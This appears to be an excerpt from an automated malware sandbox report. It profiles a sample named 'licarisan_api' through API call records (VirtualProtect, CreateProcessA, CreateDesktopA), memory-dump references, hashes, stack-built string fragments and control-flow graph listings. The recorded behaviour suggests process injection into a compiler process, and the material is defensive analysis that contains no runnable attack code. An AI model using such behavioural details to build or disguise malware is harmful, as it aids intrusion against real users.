                                    • Instruction ID: 92c271bdc90af22deca2d8ab069fba8920351cc8113e5f744a82a9e4ff6d925d
                                    • Opcode Fuzzy Hash: 8cf01369379f08a5fbe8c04a8959705451e4ad461a12f1ff44f0861ef515add0
                                    • Instruction Fuzzy Hash: 3A0144F19545596FF728CB60DC55FAAB7B8FB54300F0481EEE609A6680D6399E808F50
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: d026ec2352ca639c9e0b720e0fa34e0d80ebe95c7fe7fa314932ad2412fa21e9
                                    • Instruction ID: 3984e620eb819525f1dfeebbbd4f76639e62297d3405863fd96cba4b6f5100c1
                                    • Opcode Fuzzy Hash: d026ec2352ca639c9e0b720e0fa34e0d80ebe95c7fe7fa314932ad2412fa21e9
                                    • Instruction Fuzzy Hash: 460144F19545595FF728CB50DC55FBAB778FB54300F0481EEE60966680D6395E808F50
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,007A5A73,?,?,?,?,?,?,?,?), ref: 007A5DF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: aab9457de864079b4fc676d1968aee92daebce1a076a463c9fffbe9e4da3b9e0
                                    • Instruction ID: 8050184d872ce109a6ad0f84502f7816d78adb51733b37dc7196a49e5cf737e2
                                    • Opcode Fuzzy Hash: aab9457de864079b4fc676d1968aee92daebce1a076a463c9fffbe9e4da3b9e0
                                    • Instruction Fuzzy Hash: 720144F19545595FF728CB50DC55FABB778FB54300F0481EEE60966680D6399E808F50
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?), ref: 007BD1E3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516539906.00000000007BD000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7bd000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 9701c6281934e8b065531cd7e8627a6666b65866e52170f45206b40a1eee7d59
                                    • Instruction ID: 31ee0bfc485e5670d10dc8f00b539c102374d8c0479f6df1ab996a66e5ae682f
                                    • Opcode Fuzzy Hash: 9701c6281934e8b065531cd7e8627a6666b65866e52170f45206b40a1eee7d59
                                    • Instruction Fuzzy Hash: C1F0F6719040285BE721CA54CC58BEB7778FF50341F0046E9D60CDB150E6369E89CF91
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: d09d43ad7945e7fee041c3a362543351f6aa23732f8d7c40737a6ee548fafbfe
                                    • Instruction ID: e886bfc358fef6e6975a6b403ecb557cec548b139798783d2dba6dbe6ca63386
                                    • Opcode Fuzzy Hash: d09d43ad7945e7fee041c3a362543351f6aa23732f8d7c40737a6ee548fafbfe
                                    • Instruction Fuzzy Hash: 0E01A4B1A152189FD769CB10CCD4FE6B778EB44305F1085DEA64B5A280DB3C5E80CF25
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 8e81c4178ff77a0f1468b92d2e5577b9a79606e6d4f81deb3914c3468b538e7c
                                    • Instruction ID: 453783b2c2a0fb99dfadbd86d82141391872aecbc937134958a67c7afec5d12b
                                    • Opcode Fuzzy Hash: 8e81c4178ff77a0f1468b92d2e5577b9a79606e6d4f81deb3914c3468b538e7c
                                    • Instruction Fuzzy Hash: 9C0181B1A152189FD7698B10CCD4FE6B778EB44305F1081DEA64B5A280DA385E80CF25
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 3b655f22da194fb67730c6007a80189b389f3693d1019497f920e6d1ec0341c2
                                    • Instruction ID: 6863a1fabf4c57e6981cb1f10dc1ab763d77373ad740dee9e0b360be40c58e93
                                    • Opcode Fuzzy Hash: 3b655f22da194fb67730c6007a80189b389f3693d1019497f920e6d1ec0341c2
                                    • Instruction Fuzzy Hash: A90181B1A152189FD7698B10CCD4FE6B778EB44305F2082DEA64A5A280DA385E808F25
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B28FD
                                    • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,007B22D7,?,?,?,?,00000000,007B23F1), ref: 007B29EE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ce3466b6ca6498dd4ab8599f69ceb763b3cc871a2ca58aa974f248f2df521d89
                                    • Instruction ID: 273b86a652aef32d32fc9ff9ee61656ac79674b1efb5aa4e1340ec176d051e6b
                                    • Opcode Fuzzy Hash: ce3466b6ca6498dd4ab8599f69ceb763b3cc871a2ca58aa974f248f2df521d89
                                    • Instruction Fuzzy Hash: 44F0B4719066549FD7699B20CC14BE97BB9EF85310F0440DFE50DAA192CA755DC4CF21
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ff29f2f5fac71d49a3088341229a295d08937b9e52e6c97720208acd0e6f3c46
                                    • Instruction ID: 4fbca93e5b1c6aff27cbf9c6409c3989d304920cdce9f4412b4c2c134b89a880
                                    • Opcode Fuzzy Hash: ff29f2f5fac71d49a3088341229a295d08937b9e52e6c97720208acd0e6f3c46
                                    • Instruction Fuzzy Hash: 02F020B16152149FC76A8B60CCE4EF77B78EB45304F1082CEE30B5A081CB399E808F26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 7c0bb3511f0ee4933da69fc9222b7b307ac97302f4c4d0abad879550b4785f10
                                    • Instruction ID: 073af56a61c608fc445793186a0efab4c3a7b02f1d4947ad0d46e869968c6a48
                                    • Opcode Fuzzy Hash: 7c0bb3511f0ee4933da69fc9222b7b307ac97302f4c4d0abad879550b4785f10
                                    • Instruction Fuzzy Hash: 51016DB08091AC8FEB30DB15C8816ACBBB0BF0A319F1051DBC49996282D2349E868F45
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: ec9015dbb2681070da6787c92ef621083d9c419d9a55108b0dc85fe52c28d5e6
                                    • Instruction ID: ae9355d5ba3aa43491c99cbac5b9da0bf7065fb94f3ccfe82ad05f69e7f5da59
                                    • Opcode Fuzzy Hash: ec9015dbb2681070da6787c92ef621083d9c419d9a55108b0dc85fe52c28d5e6
                                    • Instruction Fuzzy Hash: 64F0E5B16242549FD76DCB60CC98EE77778EB84304F1082DEA20B5A081DB399E808F05
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00437BB7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 8e5b4b32e8e15b2fc5841874e4b2f4bc8ea3451fed7caad48925152c529c4f98
                                    • Instruction ID: 2420b67199de159ef091c6d46dea3472d044b7077e82cbfbbb276946968a5447
                                    • Opcode Fuzzy Hash: 8e5b4b32e8e15b2fc5841874e4b2f4bc8ea3451fed7caad48925152c529c4f98
                                    • Instruction Fuzzy Hash: 6CF049B090926D8EEB30CB10CC957ECB7B0BF09319F0041EAC4AD66280C3385EC19F86
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 007C8CF5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: 10fa37949360c3ecf08d6b7ef30c8c05df7abe32ce03343b21a2c9a4df937790
                                    • Instruction ID: 4321e97c2f7959dbf5c777f610102cd647b22ce6474961401dacd6fd2cb4a5c2
                                    • Opcode Fuzzy Hash: 10fa37949360c3ecf08d6b7ef30c8c05df7abe32ce03343b21a2c9a4df937790
                                    • Instruction Fuzzy Hash: 6EE092B1A146549EC76A9B648C68EAB7BB8AF46304F1041CEE24A5B081DB349A818F12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: E$G$G$H$H$M$M$P$V$W$W$a$a$a$c$d$d$d$d$e$e$e$e$e$e$e$i$l$l$l$l$l$n$n$o$o$o$r$r$t$t$t$t$t$u$u$u$x
                                    • API String ID: 0-1614795529
                                    • Opcode ID: 2d8606e901c87d84c590fb8d61368a799dfa844001f45568216a8e9dc08478b7
                                    • Instruction ID: fa5cfc387f4b553ce69fc162366cd4bcb99108db84debfdbb957c689cefa2769
                                    • Opcode Fuzzy Hash: 2d8606e901c87d84c590fb8d61368a799dfa844001f45568216a8e9dc08478b7
                                    • Instruction Fuzzy Hash: 33B1D160D086E8D9FB258628DC08BDBBA759F65304F0440FDD14CAB281D6BE4FD48B3A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A$E$F$L$L$P$V$V$W$a$a$a$a$b$c$c$d$e$e$e$i$i$i$i$l$l$l$l$o$o$o$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y
                                    • API String ID: 0-2526299333
                                    • Opcode ID: b312ae2cf88b9d2adab0999e89c95a1cca43936e2dbbb0a56803911b926e4a60
                                    • Instruction ID: a4ebcc1c7a01cb681dc6f3b4bae5449d79fe82a70953cbc59b87d24a7d03dcbf
                                    • Opcode Fuzzy Hash: b312ae2cf88b9d2adab0999e89c95a1cca43936e2dbbb0a56803911b926e4a60
                                    • Instruction Fuzzy Hash: B202C561D086A8CEF7218B24DC047AABA75EF96304F1441F9D54DA7282DA7E0FD4CF22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: A$E$F$L$L$P$V$V$W$a$a$a$a$b$c$c$d$e$e$e$i$i$i$i$l$l$l$l$o$o$o$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y
                                    • API String ID: 0-2526299333
                                    • Opcode ID: f804407e4b2c59fa78ad1642245432061ad90c281026a65c4e5b18163912a8fd
                                    • Instruction ID: ea28fe60a8bc3e70adff49d02a10531fce8fd4d43886849546174ea31bd0c72c
                                    • Opcode Fuzzy Hash: f804407e4b2c59fa78ad1642245432061ad90c281026a65c4e5b18163912a8fd
                                    • Instruction Fuzzy Hash: 94F1D8A1D086948FF7218624DC447EABA79EF92304F0481F9D54D67382D6BE0FD48F62
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: JI9N$KB<O$L$L$W$XS$a$a$b$d$i$o$r$r$u7V$y
                                    • API String ID: 0-1179719566
                                    • Opcode ID: 97f59a78038705dae9e27f31a84631499b9c5eac8d0b701ae58ba1310839910b
                                    • Instruction ID: a95e35ec970552aee82520789b3426ff6955b1624cfd0778b672343b38849985
                                    • Opcode Fuzzy Hash: 97f59a78038705dae9e27f31a84631499b9c5eac8d0b701ae58ba1310839910b
                                    • Instruction Fuzzy Hash: 93418CB1D059648AD7209B94DC417EAB7B1FF89311F5090EAD84DA7200E2386EC1CFA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: JI9N$L$L$W$XS$a$a$b$d$i$o$r$r$u7V$y
                                    • API String ID: 0-1821653520
                                    • Opcode ID: 19b9d58ad2addf9538037152b34ff159d14b250c315f5e69698dfe1ff32de387
                                    • Instruction ID: bf1e39dfa2e40ed735afd83b0657a99c4470b4152dab3dec8cf54ad88e3e233e
                                    • Opcode Fuzzy Hash: 19b9d58ad2addf9538037152b34ff159d14b250c315f5e69698dfe1ff32de387
                                    • Instruction Fuzzy Hash: C9319DB5D155349ADB209B94DC41BEBB7B5FF88311F1090FAD94DA7200E2385EC1CBA6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $5ZWP$L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-3300391464
                                    • Opcode ID: 9c245e819d567d922ddc5a507a7922967f7ebf691b23e993a550b77b97a83b71
                                    • Instruction ID: f2ead5c23293f4aefc9f9847524965fcac93eac02f00d577b04d57fa9b376d7f
                                    • Opcode Fuzzy Hash: 9c245e819d567d922ddc5a507a7922967f7ebf691b23e993a550b77b97a83b71
                                    • Instruction Fuzzy Hash: D881D4A1D086689AFB208B24DC447EA7775EFA0704F0480F9D94DA7781E37E0ED5CB26
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 69c2375d1b976ba8ba29afa500910bcf711f0554b72ddaa425017fa237391afd
                                    • Instruction ID: 54989faef79cc4890e4a3093fcc743d28444f0a193531649b0ab82dcce4e6ea0
                                    • Opcode Fuzzy Hash: 69c2375d1b976ba8ba29afa500910bcf711f0554b72ddaa425017fa237391afd
                                    • Instruction Fuzzy Hash: F6C1FEA1D146689FFB208B24DC04BEAB775EF95300F0481FAD90DA7282E7795EC58F16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 44cb24eba65606c1166d7644c239221e9fdf2abc9c31d862ef3f431adbc2bf62
                                    • Instruction ID: 1d41d61696faaeb6f83d9788da3d26cc202051485ec3c7bef9a3d7a00e00d122
                                    • Opcode Fuzzy Hash: 44cb24eba65606c1166d7644c239221e9fdf2abc9c31d862ef3f431adbc2bf62
                                    • Instruction Fuzzy Hash: D2B1C3A1D046688AFB208B25DC44BEAB775EF91304F0480FAD94D67281E77E4EC5CF66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 3c3711a4f4a8d9953aaf1bf67dc889b3530e64d78918102746bc0bf6a2190a81
                                    • Instruction ID: 31e55d4428be2dc01bc2485e1703538c826575187598493f724c0ca305d066cb
                                    • Opcode Fuzzy Hash: 3c3711a4f4a8d9953aaf1bf67dc889b3530e64d78918102746bc0bf6a2190a81
                                    • Instruction Fuzzy Hash: 2491D6A1D046589AFB208B25DC44BEAB779EF91704F0480FAD90D67381E37E0EC5CB26
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: b255ba1d48f57c8064a987c58bef088803b1bd00f1dadd548c70d7fc876133b7
                                    • Instruction ID: 55a1a05e5a6d9b2e7339a985b4d82b1c2388a37b2aed7fe38a28277a57372afd
                                    • Opcode Fuzzy Hash: b255ba1d48f57c8064a987c58bef088803b1bd00f1dadd548c70d7fc876133b7
                                    • Instruction Fuzzy Hash: C191D5A1D046589AFB208B25DC44BEAB775EF91704F0480F9D90DA7381E37E0ED5CB26
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516514758.00000000007B2000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B2000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7b2000_licarisan_api.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $L$L$W$a$a$b$d$i$o$r$r$y
                                    • API String ID: 0-572988056
                                    • Opcode ID: 0f9492a092ebc81cc9c7a12689f7382ef4bac5a618cf7a408d267f403c00a0de
                                    • Instruction ID: 18bae8a3b5ca29fb9dc175de35c8babb5c46aa2eb1979fe251da8c6320b6e4b7
                                    • Opcode Fuzzy Hash: 0f9492a092ebc81cc9c7a12689f7382ef4bac5a618cf7a408d267f403c00a0de
                                    • Instruction Fuzzy Hash: 1C6105A1D086A88AF7208624DC447EAB736EF91304F0480F9C94D67682D77E1FC5CF66

                                    Execution Graph

                                    Execution Coverage: 25.1%
                                    Dynamic/Decrypted Code Coverage: 100%
                                    Signature Coverage: 3.2%
                                    Total number of Nodes: 94
                                    Total number of Limit Nodes: 3

                                    Control-flow Graph

                                    APIs
                                    • CreateDesktopA.USER32(?,?,?,?,?,?,?), ref: 058248E6
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateDesktop
                                    • String ID:
                                    • API String ID: 3054513912-0
                                    • Opcode ID: ea770e17f0d82a6acff13b7d31970cf0dc9d2854c83094911b9eff48418b20ca
                                    • Instruction ID: 365327a6dc636a8dd7a746eac3c859fa1c10b382ecac942045dfbf483ac27e63
                                    • Opcode Fuzzy Hash: ea770e17f0d82a6acff13b7d31970cf0dc9d2854c83094911b9eff48418b20ca
                                    • Instruction Fuzzy Hash: D1410171D102A99FDF10CFA9C885B9EBFF2FB48310F148129E815A7660D7759881CFA1

                                    Control-flow Graph

                                    control_flow_graph 0 582516c-58255dd 3 5825616-5825636 0->3 4 58255df-58255e9 0->4 9 5825638-5825642 3->9 10 582566f-582569e 3->10 4->3 5 58255eb-58255ed 4->5 7 5825610-5825613 5->7 8 58255ef-58255f9 5->8 7->3 11 58255fb 8->11 12 58255fd-582560c 8->12 9->10 14 5825644-5825646 9->14 18 58256a0-58256aa 10->18 19 58256d7-582579f CreateProcessA 10->19 11->12 12->12 13 582560e 12->13 13->7 15 5825648-5825652 14->15 16 5825669-582566c 14->16 20 5825656-5825665 15->20 21 5825654 15->21 16->10 18->19 22 58256ac-58256ae 18->22 32 58257a1-58257a7 19->32 33 58257a8-5825838 19->33 20->20 23 5825667 20->23 21->20 24 58256b0-58256ba 22->24 25 58256d1-58256d4 22->25 23->16 27 58256be-58256cd 24->27 28 58256bc 24->28 25->19 27->27 29 58256cf 27->29 28->27 29->25 32->33 42 582583a-582583e 33->42 43 5825848-582584c 33->43 42->43 44 5825840-5825843 call 5820190 42->44 45 582584e-5825852 43->45 46 582585c-5825860 43->46 44->43 45->46 48 5825854-5825857 call 5820190 45->48 49 5825862-5825866 46->49 50 5825870-5825874 46->50 48->46 49->50 52 5825868-582586b call 5820190 49->52 53 5825886-582588d 50->53 54 5825876-582587c 50->54 52->50 56 58258a4 53->56 57 582588f-582589e 53->57 54->53 59 58258a5 56->59 57->56 59->59
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0582578C
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 342cee3ab7771e6dd77be2814d7024ca1efc5fd93d0ecf9ce17c0e8f90b85018
                                    • Instruction ID: c85f34bd3ac0e6c2db7b912671b436b7a07c42e2b35a3cc0ec8c540cb00a049e
                                    • Opcode Fuzzy Hash: 342cee3ab7771e6dd77be2814d7024ca1efc5fd93d0ecf9ce17c0e8f90b85018
                                    • Instruction Fuzzy Hash: 9CA15A71D402299FDB20DFA9C845BEDBBB1BF48310F1485AAE819EA240DB749DC5CF91

                                    Control-flow Graph

                                    control_flow_graph 60 5822c6c-5822c76 61 5822c78-5822c7c 60->61 62 5822c7d-5822d15 60->62 61->62 64 5822d17-5822d21 62->64 65 5822d4e-5822d6e 62->65 64->65 66 5822d23-5822d25 64->66 72 5822d70-5822d7a 65->72 73 5822da7-5822dd6 65->73 67 5822d27-5822d31 66->67 68 5822d48-5822d4b 66->68 70 5822d33 67->70 71 5822d35-5822d44 67->71 68->65 70->71 71->71 74 5822d46 71->74 72->73 75 5822d7c-5822d7e 72->75 79 5822dd8-5822de2 73->79 80 5822e0f-5822ed7 CreateProcessA 73->80 74->68 77 5822d80-5822d8a 75->77 78 5822da1-5822da4 75->78 81 5822d8e-5822d9d 77->81 82 5822d8c 77->82 78->73 79->80 83 5822de4-5822de6 79->83 93 5822ee0-5822f70 80->93 94 5822ed9-5822edf 80->94 81->81 84 5822d9f 81->84 82->81 85 5822de8-5822df2 83->85 86 5822e09-5822e0c 83->86 84->78 88 5822df6-5822e05 85->88 89 5822df4 85->89 86->80 88->88 90 5822e07 88->90 89->88 90->86 103 5822f72-5822f76 93->103 104 5822f80-5822f84 93->104 94->93 103->104 105 5822f78-5822f7b call 5820190 103->105 106 5822f86-5822f8a 104->106 107 5822f94-5822f98 104->107 105->104 106->107 109 5822f8c-5822f8f call 5820190 106->109 110 5822f9a-5822f9e 107->110 111 5822fa8-5822fac 107->111 109->107 110->111 113 5822fa0-5822fa3 call 5820190 110->113 114 5822fbe-5822fc5 111->114 115 5822fae-5822fb4 111->115 113->111 117 5822fc7-5822fd6 114->117 118 5822fdc-5823018 114->118 115->114 117->118 121 582301a-582301e 118->121 122 5822fb8-5822fbd 118->122 123 5823020-5823024 121->123 124 5823025-5823090 call 5821d18 121->124 122->114 123->124 132 5823092 124->132 133 58230a5-58230e3 124->133 232 5823094 call 5823878 132->232 233 5823094 call 5823869 132->233 140 58230e5-5823113 133->140 141 582311b-5823235 call 5821d24 133->141 134 582309a 134->133 140->141 236 5823238 call 5823011 141->236 237 5823238 call 5822f64 141->237 238 5823238 call 5822c78 141->238 239 5823238 call 5822c6c 141->239 162 582323a-58232a0 call 5821d30 174 58232a6-58233dc 162->174 175 58233e9-5823415 162->175 234 58233de call 5824b10 
174->234 235 58233de call 5824b20 174->235 184 5823566-582356d 175->184 185 582341b-5823559 175->185 185->184 226 58233e4 226->184 232->134 233->134 234->226 235->226 236->162 237->162 238->162 239->162
                                    APIs
                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05822EC4
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1447495448.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_5820000_csc.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 58d2eec8721014d36794faadccec58c5eed6a0c17b48a0d1985bdfd11db753ce
                                    • Instruction ID: 30d62c76b9c81e18f11852c243e32965d9ab1bca9e6561c4e9c4117e9cd162c2
                                    • Opcode Fuzzy Hash: 58d2eec8721014d36794faadccec58c5eed6a0c17b48a0d1985bdfd11db753ce
                                    • Instruction Fuzzy Hash: CAA15B75D002299FEB24DF69C841BEDBBB1BF48310F0485A9E81AF6240DB749D85CF91

                                    Control-flow Graph

